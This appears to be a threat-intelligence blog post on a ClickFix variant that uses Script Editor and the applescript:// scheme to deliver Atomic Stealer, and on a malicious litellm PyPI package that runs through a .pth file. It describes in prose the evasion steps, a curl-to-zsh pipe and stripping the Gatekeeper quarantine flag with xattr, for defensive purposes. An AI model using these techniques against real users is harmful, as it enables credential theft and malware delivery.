Apple Patched the Door. Attackers Used the Window.

John Z Black Apr 10, 2026 Threat Intelligence #atomic-stealer #amos #macos #clickfix #script-editor #malware #pypi #litellm #supply-chain

Apple shipped macOS 26.4 with a fix for ClickFix, the social engineering technique that tricks users into pasting commands into Terminal to deliver Atomic Stealer. The fix worked: a warning dialog now appears before suspicious Terminal activity runs.

Attackers took about 48 hours to find the workaround.

The new variant skips Terminal entirely and uses Script Editor, Apple’s IDE for AppleScript. No dialog. No scanning. When the user clicks “Execute” on the malicious page, the browser triggers the applescript:// URL scheme and hands off directly to Script Editor. From there, a curl-to-zsh pipe runs in memory, strips the Gatekeeper quarantine flag with xattr -c, and drops Atomic Stealer.

Old version: open Terminal, paste, hit Enter. New version: one click.

The structural problem is that app-specific mitigations don’t actually solve the underlying behavior. Terminal was flagged. Script Editor wasn’t. There’s a long list of macOS applications that can execute code or trigger system commands. You can’t patch each one in isolation and call it done.

Behavioral detection is more durable. A curl-to-zsh pipe that downloads a binary, strips Gatekeeper flags, and makes it executable is suspicious regardless of what launched it. That’s the signal worth watching, not which app it came from.

A second malicious litellm package on PyPI drives the same point home. It uses a .pth file that executes on every Python startup, with no import required. Security tools that scan for suspicious imports miss it completely. Same logic: the obvious path was watched, so attackers used the one that wasn’t.

Apple hasn’t patched Script Editor as of publication.

The full breakdown of how the new attack chain works and why the fix didn’t stick